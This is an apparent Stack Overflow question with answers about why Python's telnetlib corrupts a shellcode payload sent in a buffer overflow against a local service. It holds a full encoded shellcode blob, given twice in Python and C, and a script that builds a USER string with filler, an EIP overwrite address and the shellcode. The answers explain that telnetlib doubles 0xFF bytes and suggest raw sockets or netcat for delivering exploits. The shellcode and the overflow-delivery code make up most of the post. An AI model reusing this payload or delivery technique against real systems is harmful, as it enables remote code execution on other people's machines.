# I was using a little shellcode in my python but failed

Tags: python, string, arrays

Python version is 2.7.3.

Code is like this...
The completed code is [here](https://gist.github.com/3977494)

https://gist.github.com/3977494

```
shellcode = bytearray(
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
        )

tn = telnetlib.Telnet('127.0.0.1', 11000) 
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n' 
tn.write(user_string) 
pass_string = "PASS 123\n" 
tn.write(pass_string)
```

My friend use the same string in c everything works well. When I check the ollyDbg, I found the command is different, it seems python change the coding type. I don't know... Any help? It's driving me crazy.

```
unsigned char shellcode[] = 
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";
```

[image]

Oh, I got it almost. 00AEFD70 are so many FF. Why?

I write the same funciton code in c++. Everything works right. Here is the compare.

[image]
In another word, what happend to this?

[image]

Comment: i don't think copying the string over is enough, and based on your post, there's nothing helpful... did you try following this http://r00tsec.blogspot.it/2011/10/python-one-line-shellcode.html maybe?

Comment: @njzk2 why? I think they did the same thing and they're all little-endian.

Comment: You say you want the first bytes to be eb 59, but the first bytes are EB 03 59 EB (in both C and Python)...

Comment: @nneonneo I know, another question is the additional FF. Any idea?

Comment: sorry, I writed it wrong. It's unsigned char... 16 bit @njzk2

Answer (score 2, accepted):

The [telnet lib documentation](http://docs.python.org/2/library/telnetlib.html#telnetlib.Telnet.write) indicates that (emphasis mine):

> Write a string to the socket, **doubling any IAC characters.** This can block if the connection is blocked. May raise socket.error if the connection is closed.

The IAC character happens to be ASCII 255, which is `'\xff'`.

If you compare your two dumps: the IAC char `FF` is being doubled in the python version, but not in the C version, which is using a raw socket, which you could do in Python too using the `socket` module.

Comment: Just some additional advice: any time you are trying to mess with shellcode or network testing of any sort, use straight TCP sockets and not telnet. That is, on Linux use `nc` (netcat) and when programming use regular sockets (in Python, `socket(AF_INET, SOCK_STREAM)`).

Answer (score 1):

Your use of `bytearray` may be altering the shellcode, try defining the shellcode without the `bytearray` function. e.g:

```
shellcode = (
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        ...
        ...
)
```

Comment: I know this is an old post, but this helped me on a encoder I've been writing. Thank you Craig!